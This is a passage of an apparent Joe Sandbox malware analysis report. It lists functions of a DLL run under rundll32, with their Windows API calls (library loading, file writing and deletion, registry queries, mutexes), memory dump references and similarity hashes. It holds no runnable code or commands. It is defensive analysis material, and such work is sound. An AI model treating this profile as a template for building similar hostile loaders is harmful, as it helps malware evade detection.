    • Associated: 00000008.00000002.3509927061.00007FFE11524000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3510002189.00007FFE11526000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3510084649.00007FFE11528000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_8_2_7ffe11500000_rundll32.jbxd
    Similarity
    • API ID: wcscat$wcscpy$DeleteFile$DirectoryEnvironmentExpandRemoveStrings
    • String ID:
    • API String ID: 2221106753-0
    • Opcode ID: 3f08b2f3857772e7bd4f137949d595b3f2607b7651ef9369e1e742ba60cebf5d
    • Instruction ID: 302b3a8bb670bc8e18199c52201b7edbefd2b4d99bced4d2b90c42442b7bbdb1
    • Opcode Fuzzy Hash: 3f08b2f3857772e7bd4f137949d595b3f2607b7651ef9369e1e742ba60cebf5d
    • Instruction Fuzzy Hash: 7A514E6261CE8695DF30EB16E4901EEA325FBC1754F801076E68E439B9DE2CD90DCB40
    Function 00007FFE11504270 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 174libraryloaderCOMMON
    Download Yara Rule
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000008.00000002.3509690889.00007FFE11501000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE11500000, based on PE: true
    • Associated: 00000008.00000002.3509603791.00007FFE11500000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3509806801.00007FFE11519000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3509927061.00007FFE11524000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3510002189.00007FFE11526000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3510084649.00007FFE11528000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_8_2_7ffe11500000_rundll32.jbxd
    Similarity
    • API ID: AddressProcwcscat$LibraryLoad$FileModuleName_vswprintf_s_lswprintf
    • String ID: "%ls",%ls %ls
    • API String ID: 1950665352-3684409233
    • Opcode ID: 7ac86cf73ec6f21287da482e3f960a38ae5f8bf6a852bf3f3cc1b7f49ea5b46a
    • Instruction ID: 93424860df9af8b5c30b0c5083887fa5b65d9c212f057991072f10763ff106d2
    • Opcode Fuzzy Hash: 7ac86cf73ec6f21287da482e3f960a38ae5f8bf6a852bf3f3cc1b7f49ea5b46a
    • Instruction Fuzzy Hash: 53B1D43291DE8185E760DB62E4943AEB3A8FBC4764F500179E6CD46AB9DF7CD848CB40
    Function 00007FFE1151047C Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 117COMMONLIBRARYCODE
    Download Yara Rule
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000008.00000002.3509690889.00007FFE11501000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE11500000, based on PE: true
    • Associated: 00000008.00000002.3509603791.00007FFE11500000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3509806801.00007FFE11519000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3509927061.00007FFE11524000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3510002189.00007FFE11526000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3510084649.00007FFE11528000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_8_2_7ffe11500000_rundll32.jbxd
    Similarity
    • API ID: _invalid_parameter_noinfo
    • String ID: INF$NAN$NAN(IND)$NAN(SNAN)$inf$nan$nan(ind)$nan(snan)
    • API String ID: 3215553584-2617248754
    • Opcode ID: d61291fe73c288b30c6e1b7a2f036aee91b398c5310b8ac284d514a42b418a66
    • Instruction ID: 1c11f071706ae4aca7ecbc77af1ea672605f786ee72447c4184551af0f7be422
    • Opcode Fuzzy Hash: d61291fe73c288b30c6e1b7a2f036aee91b398c5310b8ac284d514a42b418a66
    • Instruction Fuzzy Hash: 20418932B09F8589F706CB66E8517AD33A9EB043A8F50457AEE5C07BA5EE3CD425C344
    Function 00007FFE11504DC0 Relevance: 15.1, APIs: 10, Instructions: 107sleepsynchronizationCOMMON
    Download Yara Rule
    APIs
    Memory Dump Source
    • Source File: 00000008.00000002.3509690889.00007FFE11501000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE11500000, based on PE: true
    • Associated: 00000008.00000002.3509603791.00007FFE11500000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3509806801.00007FFE11519000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3509927061.00007FFE11524000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3510002189.00007FFE11526000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3510084649.00007FFE11528000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_8_2_7ffe11500000_rundll32.jbxd
    Similarity
    • API ID: wcscat$Sleepwcscpy$CloseCreateHandleMutex
    • String ID:
    • API String ID: 859675624-0
    • Opcode ID: 813a8c226c73e745290e7a532b8a80e84a097e3f285a833d78f3018bb7183fde
    • Instruction ID: c988ebc1a0fb5f507bf5b898f4d29bc48a487d9180f1623f9a67c055d64636ef
    • Opcode Fuzzy Hash: 813a8c226c73e745290e7a532b8a80e84a097e3f285a833d78f3018bb7183fde
    • Instruction Fuzzy Hash: D7513F32518E8186EB10DB62E4943AFB7A4FBC47A4F40017AE68D47AB9DF3CD945CB40
    Function 00007FFE11508F40 Relevance: 12.1, APIs: 8, Instructions: 145libraryloaderCOMMON
    Download Yara Rule
    APIs
    • LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFE115087EC), ref: 00007FFE11508FB7
    • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFE115087EC), ref: 00007FFE11508FF5
    • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFE115087EC), ref: 00007FFE11509033
    • LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFE115087EC), ref: 00007FFE1150906A
    • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFE115087EC), ref: 00007FFE115090A8
    • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFE115087EC), ref: 00007FFE115090E6
    • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFE115087EC), ref: 00007FFE11509124
    • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFE115087EC), ref: 00007FFE11509162
    Memory Dump Source
    • Source File: 00000008.00000002.3509690889.00007FFE11501000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE11500000, based on PE: true
    • Associated: 00000008.00000002.3509603791.00007FFE11500000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3509806801.00007FFE11519000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3509927061.00007FFE11524000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3510002189.00007FFE11526000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3510084649.00007FFE11528000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_8_2_7ffe11500000_rundll32.jbxd
    Similarity
    • API ID: AddressProc$LibraryLoad
    • String ID:
    • API String ID: 2238633743-0
    • Opcode ID: a17128498188afb4e7faefc0956fe52f2ccca10067907e4c810cdd07455c527e
    • Instruction ID: 57e651ab465eb849ec8e515b3be241b2d1d5ae6f7f5664ef57f4dfa377268bb4
    • Opcode Fuzzy Hash: a17128498188afb4e7faefc0956fe52f2ccca10067907e4c810cdd07455c527e
    • Instruction Fuzzy Hash: 5C919732919E86C5EB509BA2F85436A73B8FB84760F5000B9E98D83A75DF7CE484CB51
    Function 00007FFE11508CF0 Relevance: 12.1, APIs: 8, Instructions: 102libraryloaderCOMMON
    Download Yara Rule
    APIs
    • LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFE11508AB6), ref: 00007FFE11508D6A
    • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFE11508AB6), ref: 00007FFE11508DA8
    • LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFE11508AB6), ref: 00007FFE11508DDF
    • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFE11508AB6), ref: 00007FFE11508E1D
    • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFE11508AB6), ref: 00007FFE11508E5B
    • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFE11508AB6), ref: 00007FFE11508E99
    • LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFE11508AB6), ref: 00007FFE11508ED0
    • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFE11508AB6), ref: 00007FFE11508F0E
    Memory Dump Source
    • Source File: 00000008.00000002.3509690889.00007FFE11501000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE11500000, based on PE: true
    • Associated: 00000008.00000002.3509603791.00007FFE11500000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3509806801.00007FFE11519000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3509927061.00007FFE11524000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3510002189.00007FFE11526000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3510084649.00007FFE11528000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_8_2_7ffe11500000_rundll32.jbxd
    Similarity
    • API ID: AddressProc$LibraryLoad
    • String ID:
    • API String ID: 2238633743-0
    • Opcode ID: fce1d11985e05978db1864bd94c0c65cdcffbee78ce75ed191d8cbf05e198f64
    • Instruction ID: 9b75cf03af4b7267fbc72ab0355520e55358c1244edf914040ebfe95a905fb6c
    • Opcode Fuzzy Hash: fce1d11985e05978db1864bd94c0c65cdcffbee78ce75ed191d8cbf05e198f64
    • Instruction Fuzzy Hash: D861B532D19E46C5EB50DBA2E89437A63B8FB84770F5001B9E98D826B5DF7CE8848711
    Function 00007FFE1150E5FC Relevance: 9.2, APIs: 3, Strings: 2, Instructions: 488COMMONLIBRARYCODE
    Download Yara Rule
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000008.00000002.3509690889.00007FFE11501000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE11500000, based on PE: true
    • Associated: 00000008.00000002.3509603791.00007FFE11500000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3509806801.00007FFE11519000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3509927061.00007FFE11524000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3510002189.00007FFE11526000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3510084649.00007FFE11528000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_8_2_7ffe11500000_rundll32.jbxd
    Similarity
    • API ID: _invalid_parameter_noinfo
    • String ID: +$-
    • API String ID: 3215553584-2137968064
    • Opcode ID: 71210f2582e464a0a471a66a04251737dbaa018989f03128c340a2212adcaa4b
    • Instruction ID: c2add108f8f0eb45061016275070246627456d95ae6c044662e557e5ca90db99
    • Opcode Fuzzy Hash: 71210f2582e464a0a471a66a04251737dbaa018989f03128c340a2212adcaa4b
    • Instruction Fuzzy Hash: 4612C526E0DD6345FB249A97D0442BC669EEF40774FEC41BAD69A432F0DF2CE681A704
    Function 00007FFE115046B0 Relevance: 9.1, APIs: 6, Instructions: 85libraryloaderfileCOMMON
    Download Yara Rule
    APIs
    Memory Dump Source
    • Source File: 00000008.00000002.3509690889.00007FFE11501000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE11500000, based on PE: true
    • Associated: 00000008.00000002.3509603791.00007FFE11500000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3509806801.00007FFE11519000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3509927061.00007FFE11524000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3510002189.00007FFE11526000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3510084649.00007FFE11528000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_8_2_7ffe11500000_rundll32.jbxd
    Similarity
    • API ID: AddressProc$File$DeleteLibraryLoadModuleName
    • String ID:
    • API String ID: 3615269725-0
    • Opcode ID: e99044e11731c57dbd82a7436a7fcb8d1a793e2e708b2735417dfccd9acd41f5
    • Instruction ID: a2b284ba31b98c5263f9a6bbe8ccba939f2b1aa8ce557931def97fee63388fef
    • Opcode Fuzzy Hash: e99044e11731c57dbd82a7436a7fcb8d1a793e2e708b2735417dfccd9acd41f5
    • Instruction Fuzzy Hash: 9651F732918E8182EB609B62F49436EB7B8FBC4764F401179E6CD42AB9DF7CD549CB40
    Function 00007FFE11501830 Relevance: 9.1, APIs: 6, Instructions: 75registryCOMMON
    Download Yara Rule
    APIs
    Memory Dump Source
    • Source File: 00000008.00000002.3509690889.00007FFE11501000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE11500000, based on PE: true
    • Associated: 00000008.00000002.3509603791.00007FFE11500000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3509806801.00007FFE11519000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3509927061.00007FFE11524000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3510002189.00007FFE11526000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3510084649.00007FFE11528000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_8_2_7ffe11500000_rundll32.jbxd
    Similarity
    • API ID: CloseOpen$EnumQueryValue
    • String ID:
    • API String ID: 1729155201-0
    • Opcode ID: 9c4782bd5d54c8b2f4254a5c0b6a80ecf7c17107a6a5495685acaccf18321a28
    • Instruction ID: 27c8fa2d704b825dba5a93347db9db633ee00adeffd945a558147346b438a0b0
    • Opcode Fuzzy Hash: 9c4782bd5d54c8b2f4254a5c0b6a80ecf7c17107a6a5495685acaccf18321a28
    • Instruction Fuzzy Hash: FC411932618E8186E760DB66F49476EB7B4FB857A4F500135EACD82A78DF7CE508CB40
    Function 00007FFE1150D764 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29libraryloaderCOMMON
    Download Yara Rule
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000008.00000002.3509690889.00007FFE11501000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE11500000, based on PE: true
    • Associated: 00000008.00000002.3509603791.00007FFE11500000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3509806801.00007FFE11519000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3509927061.00007FFE11524000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3510002189.00007FFE11526000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3510084649.00007FFE11528000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_8_2_7ffe11500000_rundll32.jbxd
    Similarity
    • API ID: AddressFreeHandleLibraryModuleProc
    • String ID: CorExitProcess$mscoree.dll
    • API String ID: 4061214504-1276376045
    • Opcode ID: 5e573ed8c4ee126ded1d13513922153a32cd34e60b3b0e3fa287f2206dab5a33
    • Instruction ID: cc9aacfd8f5b641c221de7f121547107e6e5d2f1c4f37653d4cb22951614fd3b
    • Opcode Fuzzy Hash: 5e573ed8c4ee126ded1d13513922153a32cd34e60b3b0e3fa287f2206dab5a33
    • Instruction Fuzzy Hash: 18F04926A19F8281EF468B52F4843BD63B9AF88BA0F481079E90F46674EF3CD484C700
    Function 00007FFE11517038 Relevance: 7.7, APIs: 5, Instructions: 203COMMON
    Download Yara Rule
    APIs
    Memory Dump Source
    • Source File: 00000008.00000002.3509690889.00007FFE11501000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE11500000, based on PE: true
    • Associated: 00000008.00000002.3509603791.00007FFE11500000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3509806801.00007FFE11519000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3509927061.00007FFE11524000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3510002189.00007FFE11526000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3510084649.00007FFE11528000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_8_2_7ffe11500000_rundll32.jbxd
    Similarity
    • API ID: _invalid_parameter_noinfo
    • String ID:
    • API String ID: 3215553584-0
    • Opcode ID: 24a19ad1fa68cb3dd82936b017d67ecca1e952e8204401616d57021115da0df1
    • Instruction ID: 0e78e85b20edebac902e5ac30c753b56ed2985ebc0d18a651ed602068515d586
    • Opcode Fuzzy Hash: 24a19ad1fa68cb3dd82936b017d67ecca1e952e8204401616d57021115da0df1
    • Instruction Fuzzy Hash: 0C81C236E18E1289F7629B6B98406BD37AABB447A8F4041B5DE0E537B5CF3CE542C710
    Function 00007FFE115169AC Relevance: 7.6, APIs: 5, Instructions: 142fileCOMMON
    Download Yara Rule
    APIs
    Memory Dump Source
    • Source File: 00000008.00000002.3509690889.00007FFE11501000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE11500000, based on PE: true
    • Associated: 00000008.00000002.3509603791.00007FFE11500000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3509806801.00007FFE11519000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3509927061.00007FFE11524000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3510002189.00007FFE11526000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3510084649.00007FFE11528000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_8_2_7ffe11500000_rundll32.jbxd
    Similarity
    • API ID: FileWrite$ByteCharConsoleErrorLastMultiWide
    • String ID:
    • API String ID: 3659116390-0
    • Opcode ID: 1c8dbfc0f9a6c678fe6545e0ff9f4c6e15195c03dc9945568d828b41c0f1c9a2
    • Instruction ID: 22a5df735d7996c4023eb6aa8b3373d0b0ece43d4a213338e9b9d8c14ee672da
    • Opcode Fuzzy Hash: 1c8dbfc0f9a6c678fe6545e0ff9f4c6e15195c03dc9945568d828b41c0f1c9a2
    • Instruction Fuzzy Hash: 25519D72A14E5189E711CB66E4443AC3BBAFB44BA8F048175DE4E47AB8DF7CD145C710
    Function 00007FFE11510E0C Relevance: 7.6, APIs: 5, Instructions: 114libraryloaderCOMMONLIBRARYCODE
    Download Yara Rule
    APIs
    • GetProcAddress.KERNEL32(?,00000000,00000006,00007FFE115110E7,?,?,00000000,00007FFE1150FA7F,?,?,?,00007FFE1150F235), ref: 00007FFE11510F2E
    Memory Dump Source
    • Source File: 00000008.00000002.3509690889.00007FFE11501000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE11500000, based on PE: true
    • Associated: 00000008.00000002.3509603791.00007FFE11500000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3509806801.00007FFE11519000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3509927061.00007FFE11524000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3510002189.00007FFE11526000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3510084649.00007FFE11528000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_8_2_7ffe11500000_rundll32.jbxd
    Similarity
    • API ID: AddressProc
    • String ID:
    • API String ID: 190572456-0
    • Opcode ID: e15ac4d827317ed69b53cec698e8523a8fc4d4abecf9bddf3b96c284d10d04bd
    • Instruction ID: 8bff9acdda925c9b115c40c7d1af2da06b4af1e4dafccaf8eb61ece0e36bddd6
    • Opcode Fuzzy Hash: e15ac4d827317ed69b53cec698e8523a8fc4d4abecf9bddf3b96c284d10d04bd
    • Instruction Fuzzy Hash: 8B41CF62B0DE4285FB169B53A8046B663ABBF54BF0F094675DD2D4B7B4EE3CE4448300
    Function 00007FFE11503300 Relevance: 7.6, APIs: 5, Instructions: 74fileCOMMON
    Download Yara Rule
    APIs
    Memory Dump Source
    • Source File: 00000008.00000002.3509690889.00007FFE11501000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE11500000, based on PE: true
    • Associated: 00000008.00000002.3509603791.00007FFE11500000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3509806801.00007FFE11519000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3509927061.00007FFE11524000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3510002189.00007FFE11526000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3510084649.00007FFE11528000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_8_2_7ffe11500000_rundll32.jbxd
    Similarity
    • API ID: File$ByteCharHeapMultiPointerWide$AllocateCloseCreateHandleProcessRead
    • String ID:
    • API String ID: 4053899944-0
    • Opcode ID: b79db9a9037c3a8fbb997c2798cabdda90be4f8e10c041602780bc7ef26bfb75
    • Instruction ID: 29618f1e0c5af35c9ca59c353de1aae8d83d2483c1a65b3601c5a924bcb70c7b
    • Opcode Fuzzy Hash: b79db9a9037c3a8fbb997c2798cabdda90be4f8e10c041602780bc7ef26bfb75
    • Instruction Fuzzy Hash: 4E410436A0CA8186E3609B56F45836FB7A4FBC17A4F200178EA8D47AB9DF7DD444CB00
    Function 00007FFE11517A08 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
    Download Yara Rule
    APIs
    Memory Dump Source
    • Source File: 00000008.00000002.3509690889.00007FFE11501000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE11500000, based on PE: true
    • Associated: 00000008.00000002.3509603791.00007FFE11500000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3509806801.00007FFE11519000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3509927061.00007FFE11524000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3510002189.00007FFE11526000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3510084649.00007FFE11528000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_8_2_7ffe11500000_rundll32.jbxd
    Similarity
    • API ID: _set_statfp
    • String ID:
    • API String ID: 1156100317-0
    • Opcode ID: 328a82265769b0ffb80da814976cc54abad42b11a73727b237c9197753426e8a
    • Instruction ID: 38b5651e8df42a456765f60df08506e5f82b31a800449f87307be81b9b3d630e
    • Opcode Fuzzy Hash: 328a82265769b0ffb80da814976cc54abad42b11a73727b237c9197753426e8a
    • Instruction Fuzzy Hash: 5E11E337E9CE0341F7A611AEE4423BB014BAF443B4F0542B8EA6E025F6CEECAA414200
    Function 00007FFE11516DD8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 100fileCOMMON
    Download Yara Rule
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000008.00000002.3509690889.00007FFE11501000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE11500000, based on PE: true
    • Associated: 00000008.00000002.3509603791.00007FFE11500000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3509806801.00007FFE11519000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3509927061.00007FFE11524000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3510002189.00007FFE11526000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3510084649.00007FFE11528000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_8_2_7ffe11500000_rundll32.jbxd
    Similarity
    • API ID: ByteCharErrorFileLastMultiWideWrite
    • String ID: U
    • API String ID: 2456169464-4171548499
    • Opcode ID: 6eddbc036e5050aeab1b959d2b89e7b8800bfca6deecbe5a24fdc43e9229e2a6
    • Instruction ID: 29ca70d333ea955002ac13d3083596fb0ae5ce26dd589cc0475557bc83b81e57
    • Opcode Fuzzy Hash: 6eddbc036e5050aeab1b959d2b89e7b8800bfca6deecbe5a24fdc43e9229e2a6
    • Instruction Fuzzy Hash: A141D522B18A4186DB21CF66E4043BA7766FB887A4F804131EE4D877B8EF7CD441CB50
    Function 00007FFE115124DC Relevance: 6.1, APIs: 4, Instructions: 74COMMON
    Download Yara Rule
    APIs
    • GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FFE1150DBB7), ref: 00007FFE115124F5
    • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FFE1150DBB7), ref: 00007FFE11512557
    • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FFE1150DBB7), ref: 00007FFE11512591
    • FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FFE1150DBB7), ref: 00007FFE115125BB
    Memory Dump Source
    • Source File: 00000008.00000002.3509690889.00007FFE11501000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE11500000, based on PE: true
    • Associated: 00000008.00000002.3509603791.00007FFE11500000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3509806801.00007FFE11519000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3509927061.00007FFE11524000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3510002189.00007FFE11526000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3510084649.00007FFE11528000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_8_2_7ffe11500000_rundll32.jbxd
    Similarity
    • API ID: ByteCharEnvironmentMultiStringsWide$Free
    • String ID:
    • API String ID: 1557788787-0
    • Opcode ID: 79db9be13cf869128da37b9d5474d497bf9004c46a2759e535b0f3481bc02e87
    • Instruction ID: b4e877a3c3872626dee9215d3b4f457308a8e716f18622c3cf006920500deea1
    • Opcode Fuzzy Hash: 79db9be13cf869128da37b9d5474d497bf9004c46a2759e535b0f3481bc02e87
    • Instruction Fuzzy Hash: 4121A571F18F5181EB218F136490029A6A9FB94BE0B5D4174DE8E67BF5EF3CE4528740
    Function 00007FFE11504160 Relevance: 6.1, APIs: 4, Instructions: 52fileCOMMON
    Download Yara Rule
    APIs
      • Part of subcall function 00007FFE115026A0: MultiByteToWideChar.KERNEL32 ref: 00007FFE115026D5
      • Part of subcall function 00007FFE115026A0: MultiByteToWideChar.KERNEL32 ref: 00007FFE11502729
    • CreateFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFE11503FBB), ref: 00007FFE115041DA
    • SetFilePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFE11503FBB), ref: 00007FFE115041FA
    • WriteFile.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFE11503FBB), ref: 00007FFE11504220
    • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFE11503FBB), ref: 00007FFE11504244
    Memory Dump Source
    • Source File: 00000008.00000002.3509690889.00007FFE11501000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE11500000, based on PE: true
    • Associated: 00000008.00000002.3509603791.00007FFE11500000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3509806801.00007FFE11519000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3509927061.00007FFE11524000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3510002189.00007FFE11526000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3510084649.00007FFE11528000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
